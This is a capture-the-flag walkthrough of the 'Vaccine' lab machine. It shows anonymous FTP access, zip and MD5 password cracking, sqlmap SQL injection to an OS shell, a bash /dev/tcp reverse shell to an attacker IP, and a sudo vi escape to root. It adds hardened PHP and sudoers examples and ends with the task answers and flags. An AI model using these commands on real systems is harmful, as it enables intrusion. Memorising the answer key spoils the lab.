Article directory
- 1 Vaccine testing process
  - 1.1 Management
    - 1.1.1 FTP anonymous login
    - 1.1.2 SQL injection
  - 1.2 Privilege Elevation
- 2 Questions
1 Vaccine testing process
1.1 Management
1. Port scan
nmap -sV -sC 10.129.191.63
1.1.1 FTP anonymous login
2. FTP allows anonymous login, and backup.zip is found there
ftp 10.129.191.63
Unzip backup.zip, but a password is required:
3. Use john to crack the backup.zip password
# Generate the intermediate hash file
zip2john backup.zip > hashes
cat hashes
# Brute-force the hash with a wordlist
john --wordlist=rockyou.txt hashes
Use the recovered password to decompress backup.zip. Password: 741852963
4. backup.zip information leakage
After decompression, index.php and style.css are found. Checking index.php reveals the username admin and a password hash:
admin:2cb42f8734ea607eefed3b70af13bbd3
5. Crack the password
Identify the hash type of 2cb42f8734ea607eefed3b70af13bbd3:
hashid 2cb42f8734ea607eefed3b70af13bbd3
Crack the hash with hashcat (MD5, mode 0) and obtain the password qwerty789:
echo '2cb42f8734ea607eefed3b70af13bbd3' > hash
hashcat -a 0 -m 0 hash rockyou.txt
1.1.2 SQL injection
6. Access port 80 and log in as admin:qwerty789
7. The search interface uses the $search variable; try injecting into it
sqlmap -u 'http://10.129.191.63/dashboard.php?search=any+query' --cookie="PHPSESSID=3cir5tlpnugpfuqltp7be06o68" --batch
An injection vulnerability exists. Use sqlmap's --os-shell option to obtain a shell.
sqlmap -u 'http://10.129.191.63/dashboard.php?search=any+query' --cookie="PHPSESSID=3cir5tlpnugpfuqltp7be06o68" --batch --os-shell
8. Get a reverse shell
Start a listener:
ncat -lnvp 1234
Execute the reverse shell from the os-shell:
bash -c "bash -i >& /dev/tcp/10.10.14.20/1234 0>&1"
Upgrade to an interactive shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Get user flag:
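The two application weaknesses this section exploits, shown beside their hardened forms. This is an added illustration, not the box's real dashboard.php or index.php; the table name "items" and the $users array are assumed, and the MD5 value is the one found in index.php above.

```php
<?php
// Added illustration, not the box's real dashboard.php/index.php. Table name
// "items" and the $users array are assumed; the MD5 value is the one from index.php.

// --- Weak: the search term is concatenated into the SQL text. This is the shape of
// bug that lets sqlmap inject through ?search= and, because the app connects as the
// postgres superuser, reach COPY ... FROM PROGRAM, which is what --os-shell relies on.
function search_items_vulnerable($conn, string $search) {
    $sql = "SELECT * FROM items WHERE name ILIKE '%" . $search . "%'";
    return pg_query($conn, $sql);
}

// --- Hardened: the value is bound as $1 and never parsed as SQL. Pair this with a
// dedicated low-privilege database role instead of postgres, and read the DSN from
// the environment rather than hard-coding credentials in a file under /var/www/html.
function search_items_safe($conn, string $search) {
    $sql = 'SELECT * FROM items WHERE name ILIKE $1';
    return pg_query_params($conn, $sql, ['%' . $search . '%']);
}

// --- Weak: fast, unsalted MD5 compared against a hash hard-coded in the page.
// hashcat -m 0 against rockyou recovered this one in seconds.
function login_vulnerable(string $user, string $pass): bool {
    return $user === 'admin' && md5($pass) === '2cb42f8734ea607eefed3b70af13bbd3';
}

// --- Hardened: per-user salted, slow hash (bcrypt via PASSWORD_DEFAULT), stored in
// the database rather than the web root, checked by password_verify().
function login_safe(string $user, string $pass, array $users): bool {
    // $users maps username => value previously produced by
    // password_hash($plaintext, PASSWORD_DEFAULT) when the account was created.
    return isset($users[$user]) && password_verify($pass, $users[$user]);
}
```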
1.2 Privilege Elevation
1. Look for useful clues in the postgres user's shell
The following files were found in the /var/www/html directory:
Viewing dashboard.php reveals:
2. Log in via SSH as postgres:P@s5w0rd!
3. Check sudo permissions
sudo -l
The output shows that the postgres user can run /bin/vi on /etc/postgresql/11/main/pg_hba.conf via sudo.
4. Edit pg_hba.conf with sudo vi and escape to a root shell
# Open pg_hba.conf as root
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
# In vi, without entering insert mode, type each command and press Enter:
:set shell=/bin/sh
:shell
Obtain root permissions:
Find flag:
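The sudo rule behind step 4, beside a form that does not hand out a root shell. This is an added illustration, not part of the original writeup; the writeup does not reproduce the exact line sudo -l printed, so the weak rule is an assumed shape.

```text
# Added illustration; the exact rule sudo -l printed on the box is not reproduced
# in the writeup, so the weak line below is an assumed shape, not a quote.

# Weak: a full editor runs as root, so ":set shell=/bin/sh" then ":shell" inside vi
# gives the postgres user a root shell (what section 1.2 step 4 does).
postgres ALL=(root) /bin/vi /etc/postgresql/11/main/pg_hba.conf

# Hardened: sudoedit runs the editor as the invoking user on a temporary copy and
# only the final write-back is done as root, so an editor shell escape stays as postgres.
postgres ALL=(root) sudoedit /etc/postgresql/11/main/pg_hba.conf

# Note: on Debian-style installs /etc/postgresql/<ver>/main/pg_hba.conf is typically
# owned by postgres already, in which case no sudo rule is needed at all.
```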
2 Questions
Tags
Web, Network, Vulnerability Assessment, Databases, Injection, Custom Applications, Protocols, Source Code Analysis, Apache, PostgreSQL, FTP, PHP, Reconnaissance, Password Cracking, SUDO Exploitation, SQL Injection, Remote Code Execution, Clear Text Credentials, Anonymous/Guest Access
TASK 1
Besides SSH and HTTP, what other service is hosted on this box? Answer: FTP
TASK 2
This service can be configured to allow login with any password for specific username. What is that username? Answer: anonymous
TASK 3
What is the name of the file downloaded over this service? Answer: backup.zip
TASK 4
What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts? Answer: zip2john
TASK 5
What is the password for the admin user on the website? Answer: qwerty789
TASK 6
What option can be passed to sqlmap to try to get command execution via the sql injection? Answer: --os-shell
TASK 7
What program can the postgres user run as root using sudo? Answer: vi
SUBMIT FLAG
Submit user flag. Answer: ec9b13ca4d6229cd5cc1e09980965bf7
SUBMIT FLAG
Submit root flag. Answer: dd6e058e814260bc70e9bbdef2715849